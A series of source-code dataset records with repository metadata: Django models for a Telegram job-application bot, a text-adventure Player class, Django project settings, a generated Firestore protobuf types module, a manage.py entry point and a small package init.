bdceae09f3f12e2c784454982314c598267c7550 | d1d626e557cc3ec2068734c464afdde6d0b44a92 | /bot/models.py | 70d55805aa7993b986707e1145d34e9f2b759e43 | [] | no_license | akhad97/Telegram-Bot | d279899f1cacebdb3317f2084047beaa4507c0fb | fd999c03b7b1abd2d433efcd67d9047430c66e4a | refs/heads/master | 2023-07-02T06:53:41.697269 | 2021-08-03T17:41:07 | 2021-08-03T17:41:07 | 352,558,410 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,104 | py | from django.db import models
class TelegramUser(models.Model):
    """A Telegram bot user and the application data collected from them."""

    # Telegram chat/user identifier, stored as text.
    user_id = models.CharField(max_length=30)
    full_name = models.CharField(max_length=100)
    phone_number = models.CharField(max_length=15, null=True)
    # Presumably the stored resume file name/path -- confirm against the
    # bot handlers (a FileField variant is left commented out below).
    resume = models.CharField(max_length=100, null=True)
    # resume = models.FileField(upload_to="resume/%Y/%m", null=True)

    class Meta:
        verbose_name = 'TelegramUser'
        verbose_name_plural = 'TelegramUsers'

    def __str__(self):
        return self.full_name
class Vacancy(models.Model):
    """A job vacancy users can apply to."""

    name = models.CharField(max_length=100, null=True, blank=True)

    def __str__(self):
        # Fix: name is nullable, and __str__ must return a str -- returning
        # None raised TypeError in the admin / shell. Fall back to ''.
        return self.name or ''
# class Language(models.Model):
# vacancy = models.ForeignKey(Vacancy, on_delete=models.CASCADE)
# name = models.CharField(max_length=50)
# code = models.CharField(max_length=30)
class Post(models.Model):
    """Links a Telegram user to the vacancy they applied for."""

    user = models.ForeignKey(TelegramUser, on_delete=models.CASCADE, null=True)
    vacancy = models.ForeignKey(Vacancy, on_delete=models.CASCADE, null=True)

    def __str__(self):
        # Fix: user is nullable (null=True), so self.user.full_name raised
        # AttributeError for posts without a user. Fall back to the pk.
        return self.user.full_name if self.user else 'Post #{}'.format(self.pk)
"ahadjon.abdullaev1997@gmail.com"
] | ahadjon.abdullaev1997@gmail.com |
7174ae4f6fc58d37b2db7961201abda58c6e5f29 | 2afb2a5b8e77d6ec9d15f9b72e6873045dc168d9 | /Player.py | 0d074ea891b20f1f6f0d678a654815cf7434c6bd | [] | no_license | EnmanuelA/Program_5 | 23fdee6940ab921d32d8c1b3e2d8b0d2c5db1196 | 0bfb52d367d8bd1ad972f37578f1dfda1ed30b09 | refs/heads/master | 2016-09-14T05:11:45.072675 | 2016-04-26T02:19:33 | 2016-04-26T02:19:33 | 57,090,627 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,307 | py | from Treasure import *
from Level import *
class Player:
    """The player avatar: tracks position on a level, inventory, and health."""

    def __init__(self, current_level):
        # Map vi-style movement keys to (dx, dy) grid displacements.
        self.__displacements = {"h": (-1, 0), "k": (0, 1), "j": (0, -1), "l": (1, 0)}
        self.__current_level = current_level
        self.__location = current_level.get_up_point()
        # the player comes with nothing to the world
        self.__inventory = []
        # health is 100 when we first start
        self.__health = 100

    def move(self, command):
        """Try to move one step ('h' left, 'j' down, 'k' up, 'l' right).

        Returns "OK" on success, otherwise "You can't go there".
        Fix: use the displacement table (the commented-out original called it
        with () instead of []); unknown commands no longer crash with an
        unbound dx/dy NameError.
        """
        try:
            (dx, dy) = self.__displacements[command]
        except KeyError:
            return "You can't go there"
        new_x = self.__location[0] + dx
        new_y = self.__location[1] + dy
        # ask the level whether the destination is walkable
        if self.__current_level.is_valid_location(new_x, new_y):
            self.__location = (new_x, new_y)
            return "OK"
        return "You can't go there"

    def set_location(self, location):
        self.__location = location

    def get_location(self):
        return self.__location

    def pick_up(self, obj):
        """Add *obj* to the inventory and notify the object it was taken."""
        self.__inventory.append(obj)
        # Fix: user-facing typo "and object" -> "an object".
        print("You picked up an object")
        obj.pick_up()

    def print_inventory(self):
        """Print each carried object with a 1-based index."""
        for obj_index, obj in enumerate(self.__inventory, start=1):
            print("(" + str(obj_index) + ")\t" + str(obj))

    #-------------------------------------
    # to be done
    #-------------------------------------
    def look_at(self):
        # Fix: the stub returned an undefined name (NameError). Provide a
        # safe placeholder until the real description logic is written.
        resultStr = "You see nothing special."
        return resultStr

    def eat(self, obj_index):
        # Fix: same undefined-name stub as look_at.
        # TODO: consume an edible item at obj_index and restore health.
        resultStr = "You can't eat that!"
        return resultStr

    def drop(self, obj_index):
        resultStr = "You can't drop that!"
        # make sure that the index is valid. If it is,
        # then update inventory, object status, and
        # change return to --> You dropped [object description]
        return resultStr

    def wear(self, obj_index):
        resultStr = "You can't wear that!"
        # make sure that the player is not already wearing.
        # make sure that the index is valid. If it is,
        # then update inventory, object status, and
        # change return to --> You now wearing [object description]
        return resultStr

    def remove(self):
        resultStr = "You are not wearing anything!"
        # make sure that player is wearing an armor.
        # then update inventory, object status, and
        # change return to --> You removed [object description]
        return resultStr

    def unwield(self):
        resultStr = "You are not wielding anything!"
        # make sure that player is wielding a weapon.
        # then update inventory, object status, and
        # change return to --> You removed [object description]
        return resultStr

    def equip(self):
        resultStr = "OK."
        # make the player wear the first armor on inventory list
        # (if not already wearing one) and wield the first weapon
        # on the inventory list (if not already wielding one).
        return resultStr
| [
"enmanunm@my.uri.edu"
] | enmanunm@my.uri.edu |
db38dd76b0fceae10b1ca8bae0bbb2be88eebc4c | a4be06af5b3997ca882d45d2ed63c80d7e4488fa | /prmgt/settings.py | 1afebdc348d84d879773138545d0290536c2a421 | [] | no_license | pyrephyo/prmgt | c7834639320ffed421cbf52f699f4ceabab12dca | b2b7e7d56274958bea3d30a5e109f6123d4878c2 | refs/heads/master | 2021-01-20T20:18:53.632861 | 2016-08-10T21:39:41 | 2016-08-10T21:39:41 | 65,244,557 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,091 | py | """
Django settings for prmgt project.
Generated by 'django-admin startproject' using Django 1.10.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to version control; load it from an
# environment variable and rotate it before any production deployment.
SECRET_KEY = 'jfy*l5ixm10eu!_1#!ntvirfdszdvmv-9l1h1hdcr)67t6('
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
# Hosts/domains this site may serve; must be populated when DEBUG is False.
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'prmgt.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'prmgt.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
| [
"nkolson@pyrephyo.se"
] | nkolson@pyrephyo.se |
f35c47216bf7bbfc65746823ab7740447c6a723d | bb3306f1f19847f43aa9aa511426379d9ed4ae60 | /google/cloud/firestore_v1/types/common.py | b03242a4a8c4c8e3c6dc014396bbf604146739c1 | [
"Apache-2.0"
] | permissive | chrisrossi/python-firestore | a6b413d71e4c3394de815c2d73ab705c686821d1 | 0ae32cea8aa344825d29cc040069777162647780 | refs/heads/master | 2023-03-13T07:31:22.079376 | 2021-02-23T16:06:23 | 2021-02-23T16:06:23 | 296,692,413 | 0 | 0 | Apache-2.0 | 2020-09-18T17:50:28 | 2020-09-18T17:50:22 | null | UTF-8 | Python | false | false | 3,580 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
from google.protobuf import timestamp_pb2 as timestamp # type: ignore
__protobuf__ = proto.module(
package="google.firestore.v1",
manifest={"DocumentMask", "Precondition", "TransactionOptions",},
)
class DocumentMask(proto.Message):
    r"""A set of field paths on a document. Used to restrict a get or update
    operation on a document to a subset of its fields. This is different
    from standard field masks, as this is always scoped to a
    [Document][google.firestore.v1.Document], and takes in account the
    dynamic nature of [Value][google.firestore.v1.Value].
    Attributes:
        field_paths (Sequence[str]):
            The list of field paths in the mask. See
            [Document.fields][google.firestore.v1.Document.fields] for a
            field path syntax reference.
    """

    # NOTE: generated GAPIC/proto-plus binding -- manual edits here are lost
    # when the client library is regenerated. Proto field number 1.
    field_paths = proto.RepeatedField(proto.STRING, number=1)
class Precondition(proto.Message):
r"""A precondition on a document, used for conditional
operations.
Attributes:
exists (bool):
When set to ``true``, the target document must exist. When
set to ``false``, the target document must not exist.
update_time (~.timestamp.Timestamp):
When set, the target document must exist and
have been last updated at that time.
"""
exists = proto.Field(proto.BOOL, number=1, oneof="condition_type")
update_time = proto.Field(
proto.MESSAGE, number=2, oneof="condition_type", message=timestamp.Timestamp,
)
class TransactionOptions(proto.Message):
r"""Options for creating a new transaction.
Attributes:
read_only (~.common.TransactionOptions.ReadOnly):
The transaction can only be used for read
operations.
read_write (~.common.TransactionOptions.ReadWrite):
The transaction can be used for both read and
write operations.
"""
class ReadWrite(proto.Message):
r"""Options for a transaction that can be used to read and write
documents.
Attributes:
retry_transaction (bytes):
An optional transaction to retry.
"""
retry_transaction = proto.Field(proto.BYTES, number=1)
class ReadOnly(proto.Message):
r"""Options for a transaction that can only be used to read
documents.
Attributes:
read_time (~.timestamp.Timestamp):
Reads documents at the given time.
This may not be older than 60 seconds.
"""
read_time = proto.Field(
proto.MESSAGE,
number=2,
oneof="consistency_selector",
message=timestamp.Timestamp,
)
read_only = proto.Field(proto.MESSAGE, number=2, oneof="mode", message=ReadOnly,)
read_write = proto.Field(proto.MESSAGE, number=3, oneof="mode", message=ReadWrite,)
__all__ = tuple(sorted(__protobuf__.manifest))
| [
"noreply@github.com"
] | noreply@github.com |
2f64d7cf2311b03b78ca148517b429f7ebaa4ead | 0384ab5eadd5f65ea92dc29535e389b3e5fe26e7 | /manage.py | ac9f6b57e9cbdea0f9941bca10bd177d68048f0d | [] | no_license | nathanjh-28/finch_collector | e1ebcdd93bf2d23f7b60fffede68e3971b288d77 | 37a07f3ef844f2ab776c48f3331e7dcb0704cd27 | refs/heads/master | 2023-07-30T19:47:43.139025 | 2020-07-30T00:08:08 | 2020-07-30T00:08:08 | 283,627,869 | 0 | 0 | null | 2021-06-10T19:59:04 | 2020-07-30T00:07:06 | Python | UTF-8 | Python | false | false | 643 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
    """Django CLI entry point: configure settings, then dispatch sys.argv."""
    # setdefault lets an externally provided DJANGO_SETTINGS_MODULE win.
    os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'finch_collector_project.settings')
    try:
        # Imported lazily so the friendlier error below can be raised when
        # Django itself is missing from the environment.
        from django.core.management import execute_from_command_line
    except ImportError as exc:
        raise ImportError(
            "Couldn't import Django. Are you sure it's installed and "
            "available on your PYTHONPATH environment variable? Did you "
            "forget to activate a virtual environment?"
        ) from exc
    execute_from_command_line(sys.argv)
if __name__ == '__main__':
    main()
| [
"nathan@nathanjharris.com"
] | nathan@nathanjharris.com |
c2646e175f2eac6aae45ccfa0d6697077523a4e4 | 8b2e3bf1c2db556d0ca95e60f27c224afaf4cda1 | /potnanny/apps/messenger/__init__.py | e9932c7aabdbb6a3d3609416d0ff6fa6a170f7f0 | [] | no_license | greeneryguru/potnanny-web | 96fe724ba3e9caed5d25578bdf40be0e896e2f81 | c4ca8b108c4b67b35c4b05db1fc57a6b53407c4e | refs/heads/master | 2021-01-24T02:45:13.301249 | 2018-03-12T13:54:33 | 2018-03-12T13:54:33 | 99,291,379 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 29 | py | from .views import messenger | [
"jeffreyleary@Jeffreys-MacBook-Air.local"
] | jeffreyleary@Jeffreys-MacBook-Air.local |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.